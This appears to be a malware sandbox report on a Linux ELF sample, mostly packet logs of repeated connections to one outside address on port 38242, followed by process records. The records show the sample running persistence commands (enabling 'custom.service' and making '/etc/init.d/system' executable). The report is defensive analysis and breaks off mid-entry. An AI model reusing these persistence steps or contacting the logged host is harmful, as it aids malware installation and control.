                                                      Dec 24, 2024 10:43:59.521775007 CET4463238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:43:59.684942961 CET382424463294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:00.143836021 CET382424463294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:00.144030094 CET4463238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:00.522869110 CET4463438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:00.642564058 CET382424463494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:00.642710924 CET4463438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:00.642756939 CET4463438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:00.762376070 CET382424463494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:01.147665977 CET4463438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:01.308985949 CET382424463494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:01.773533106 CET382424463494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:01.773684978 CET4463438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:02.148977995 CET4463638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:02.268846035 CET382424463694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:02.269001007 CET4463638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:02.269059896 CET4463638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:02.388833046 CET382424463694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:02.774600983 CET4463638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:02.936896086 CET382424463694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:03.395522118 CET382424463694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:03.395677090 CET4463638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:03.775966883 CET4463838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:03.895725965 CET382424463894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:03.895909071 CET4463838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:03.895942926 CET4463838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:04.015671015 CET382424463894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:04.401593924 CET4463838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:04.565037966 CET382424463894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:05.016371965 CET382424463894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:05.016813040 CET4463838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:05.402976990 CET4464038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:05.523291111 CET382424464094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:05.523488998 CET4464038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:05.523578882 CET4464038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:05.643131971 CET382424464094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:06.029467106 CET4464038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:06.193023920 CET382424464094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:06.655090094 CET382424464094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:06.655352116 CET4464038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:07.030528069 CET4464238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:07.150355101 CET382424464294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:07.150460958 CET4464238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:07.150507927 CET4464238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:07.270385981 CET382424464294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:07.656306028 CET4464238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:07.821100950 CET382424464294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:08.271974087 CET382424464294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:08.272106886 CET4464238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:08.657742977 CET4464438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:08.777496099 CET382424464494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:08.777803898 CET4464438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:08.777867079 CET4464438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:08.897500992 CET382424464494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:09.283528090 CET4464438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:09.448996067 CET382424464494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:09.931433916 CET382424464494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:09.931555033 CET4464438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:10.285058022 CET4464638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:10.406924963 CET382424464694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:10.407059908 CET4464638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:10.407108068 CET4464638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:10.526851892 CET382424464694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:10.912976980 CET4464638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:11.073085070 CET382424464694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:11.524722099 CET382424464694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:11.525011063 CET4464638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:11.914464951 CET4464838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:12.034065962 CET382424464894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:12.034326077 CET4464838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:12.034326077 CET4464838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:12.154644966 CET382424464894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:12.540020943 CET4464838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:12.701196909 CET382424464894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:13.166246891 CET382424464894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:13.166434050 CET4464838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:13.541465044 CET4465038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:13.661242008 CET382424465094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:13.661402941 CET4465038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:13.661453009 CET4465038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:13.781099081 CET382424465094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:14.167610884 CET4465038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:14.333136082 CET382424465094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:14.783006907 CET382424465094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:14.783159971 CET4465038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:15.168498993 CET4465238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:15.288161993 CET382424465294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:15.288428068 CET4465238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:15.289144039 CET4465238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:15.408859968 CET382424465294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:15.794595957 CET4465238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:15.957086086 CET382424465294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:16.414558887 CET382424465294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:16.414798975 CET4465238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:16.796011925 CET4465438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:16.915575981 CET382424465494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:16.915843010 CET4465438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:16.915911913 CET4465438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:17.035464048 CET382424465494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:17.420131922 CET4465438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:17.580984116 CET382424465494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:18.039891005 CET382424465494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:18.040009022 CET4465438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:18.421307087 CET4465638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:18.540990114 CET382424465694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:18.541162968 CET4465638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:18.541229963 CET4465638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:18.660974979 CET382424465694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:19.046396017 CET4465638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:19.209019899 CET382424465694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:19.681637049 CET382424465694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:19.681902885 CET4465638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:20.047610044 CET4465838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:20.167602062 CET382424465894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:20.167828083 CET4465838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:20.167828083 CET4465838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:20.290172100 CET382424465894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:20.673150063 CET4465838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:20.833002090 CET382424465894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:21.298981905 CET382424465894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:21.299195051 CET4465838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:21.674277067 CET4466038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:21.793792009 CET382424466094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:21.793931007 CET4466038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:21.793931007 CET4466038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:21.913767099 CET382424466094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:22.298991919 CET4466038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:22.460977077 CET382424466094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:22.925718069 CET382424466094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:22.926013947 CET4466038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:23.300179005 CET4466238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:23.419847965 CET382424466294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:23.419945002 CET4466238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:23.419991016 CET4466238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:23.539484024 CET382424466294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:23.924390078 CET4466238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:24.085000992 CET382424466294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:24.573267937 CET382424466294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:24.573429108 CET4466238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:24.925559044 CET4466438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:25.045217037 CET382424466494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:25.045337915 CET4466438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:25.045393944 CET4466438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:25.164952040 CET382424466494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:25.550117970 CET4466438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:25.713112116 CET382424466494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:26.185056925 CET382424466494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:26.185386896 CET4466438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:26.551198959 CET4466638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:26.670872927 CET382424466694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:26.671149969 CET4466638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:26.671194077 CET4466638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:26.792351007 CET382424466694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:27.176132917 CET4466638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:27.337135077 CET382424466694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:27.795229912 CET382424466694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:27.795350075 CET4466638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:28.176980019 CET4466838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:28.298185110 CET382424466894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:28.298424006 CET4466838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:28.298465967 CET4466838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:28.419547081 CET382424466894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:28.803361893 CET4466838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:28.964946032 CET382424466894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:29.434449911 CET382424466894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:29.434643030 CET4466838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:29.804496050 CET4467038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:29.924089909 CET382424467094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:29.924326897 CET4467038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:29.924326897 CET4467038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:30.043823004 CET382424467094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:30.427994967 CET4467038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:30.589015961 CET382424467094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:31.050935030 CET382424467094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:31.051193953 CET4467038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:31.429039955 CET4467238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:31.548655987 CET382424467294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:31.548783064 CET4467238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:31.548839092 CET4467238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:31.668462038 CET382424467294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:32.053735971 CET4467238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:32.217016935 CET382424467294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:32.669816971 CET382424467294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:32.670008898 CET4467238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:33.055012941 CET4467438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:33.174633026 CET382424467494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:33.174741030 CET4467438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:33.174786091 CET4467438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:33.294323921 CET382424467494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:33.680011034 CET4467438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:33.841054916 CET382424467494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:34.294348955 CET382424467494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:34.294455051 CET4467438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:34.681265116 CET4467638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:34.800936937 CET382424467694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:34.801047087 CET4467638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:34.801109076 CET4467638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:34.920603037 CET382424467694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:35.306659937 CET4467638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:35.469216108 CET382424467694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:36.308073044 CET4467838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:36.427767038 CET382424467894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:36.427895069 CET4467838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:36.427933931 CET4467838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:36.548213959 CET382424467894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:36.933387041 CET4467838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:37.097132921 CET382424467894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:37.559420109 CET382424467894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:37.559604883 CET4467838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:37.934403896 CET4468038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:38.054069042 CET382424468094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:38.054172039 CET4468038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:38.054225922 CET4468038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:38.173780918 CET382424468094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:38.559629917 CET4468038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:38.721077919 CET382424468094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:39.185348988 CET382424468094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:39.185621977 CET4468038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:39.561007977 CET4468238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:39.680949926 CET382424468294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:39.681269884 CET4468238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:39.681438923 CET4468238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:39.800894022 CET382424468294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:40.186322927 CET4468238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:40.353063107 CET382424468294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:40.811005116 CET382424468294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:40.811291933 CET4468238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:41.187336922 CET4468438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:41.306946993 CET382424468494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:41.307167053 CET4468438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:41.307167053 CET4468438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:41.427092075 CET382424468494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:41.811213970 CET4468438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:41.973067045 CET382424468494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:42.451466084 CET382424468494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:42.451705933 CET4468438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:42.812182903 CET4468638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:42.932197094 CET382424468694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:42.932368994 CET4468638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:42.932415962 CET4468638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:43.052717924 CET382424468694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:43.436098099 CET4468638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:43.601171017 CET382424468694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:44.060293913 CET382424468694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:44.060544014 CET4468638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:44.437004089 CET4468838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:44.556694031 CET382424468894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:44.556773901 CET4468838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:44.556775093 CET4468838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:44.676589012 CET382424468894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:45.060260057 CET4468838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:45.225078106 CET382424468894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:45.680398941 CET382424468894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:45.680552006 CET4468838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:46.061328888 CET4469038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:46.181077957 CET382424469094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:46.181230068 CET4469038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:46.181299925 CET4469038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:46.300852060 CET382424469094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:46.686496019 CET4469038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:46.853235960 CET382424469094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:47.300615072 CET382424469094.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:47.300761938 CET4469038242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:47.687628031 CET4469238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:47.807235003 CET382424469294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:47.807348967 CET4469238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:47.807425976 CET4469238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:47.927309036 CET382424469294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:48.312967062 CET4469238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:48.473170042 CET382424469294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:48.942538977 CET382424469294.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:48.942682028 CET4469238242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:49.314143896 CET4469438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:49.433806896 CET382424469494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:49.433929920 CET4469438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:49.433969975 CET4469438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:49.553525925 CET382424469494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:49.938152075 CET4469438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:50.105161905 CET382424469494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:50.551265955 CET382424469494.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:50.551584005 CET4469438242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:50.939207077 CET4469638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:51.058667898 CET382424469694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:51.058794975 CET4469638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:51.058850050 CET4469638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:51.178284883 CET382424469694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:51.563899994 CET4469638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:51.725296021 CET382424469694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:52.201745033 CET382424469694.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:52.201817036 CET4469638242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:52.565135002 CET4469838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:52.684855938 CET382424469894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:52.684957981 CET4469838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:52.685003042 CET4469838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:52.804703951 CET382424469894.156.227.234192.168.2.13
                                                      Dec 24, 2024 10:44:53.189939976 CET4469838242192.168.2.1394.156.227.234
                                                      Dec 24, 2024 10:44:53.353343964 CET382424469894.156.227.234192.168.2.13
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 24, 2024 10:42:50.369736910 CET4767053192.168.2.131.1.1.1
                                                      Dec 24, 2024 10:42:50.369738102 CET4964453192.168.2.131.1.1.1
                                                      Dec 24, 2024 10:42:50.507885933 CET53496441.1.1.1192.168.2.13
                                                      Dec 24, 2024 10:42:50.507977962 CET53476701.1.1.1192.168.2.13
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 24, 2024 10:42:50.369736910 CET192.168.2.131.1.1.10x40adStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                      Dec 24, 2024 10:42:50.369738102 CET192.168.2.131.1.1.10x5f46Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 24, 2024 10:42:50.507977962 CET1.1.1.1192.168.2.130x40adNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                      Dec 24, 2024 10:42:50.507977962 CET1.1.1.1192.168.2.130x40adNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                                                      System Behavior

                                                      Start time (UTC):09:42:47
                                                      Start date (UTC):24/12/2024
                                                      Path:/tmp/x86_32.nn.elf
                                                      Arguments:/tmp/x86_32.nn.elf
                                                      File size:79312 bytes
                                                      MD5 hash:3f1efbfbb79821f4bd17c6a3eff17aa6

                                                      Start time (UTC):09:42:47
                                                      Start date (UTC):24/12/2024
                                                      Path:/tmp/x86_32.nn.elf
                                                      Arguments:-
                                                      File size:79312 bytes
                                                      MD5 hash:3f1efbfbb79821f4bd17c6a3eff17aa6

                                                      Start time (UTC):09:42:47
                                                      Start date (UTC):24/12/2024
                                                      Path:/bin/sh
                                                      Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):09:42:47
                                                      Start date (UTC):24/12/2024
                                                      Path:/bin/sh
                                                      Arguments:-
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):09:42:47
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/bin/systemctl
                                                      Arguments:systemctl enable custom.service
                                                      File size:996584 bytes
                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/tmp/x86_32.nn.elf
                                                      Arguments:-
                                                      File size:79312 bytes
                                                      MD5 hash:3f1efbfbb79821f4bd17c6a3eff17aa6

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/bin/sh
                                                      Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/bin/sh
                                                      Arguments:-
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):09:42:48
                                                      Start date (UTC):24/12/2024
                                                      Path:/usr/bin/chmod
                                                      Arguments:chmod +x /etc/init.d/system
                                                      File size:63864 bytes
                                                      MD5 hash:739483b900c045ae1374d6f53a86a279

                                                      Start time (UTC):09:42:48
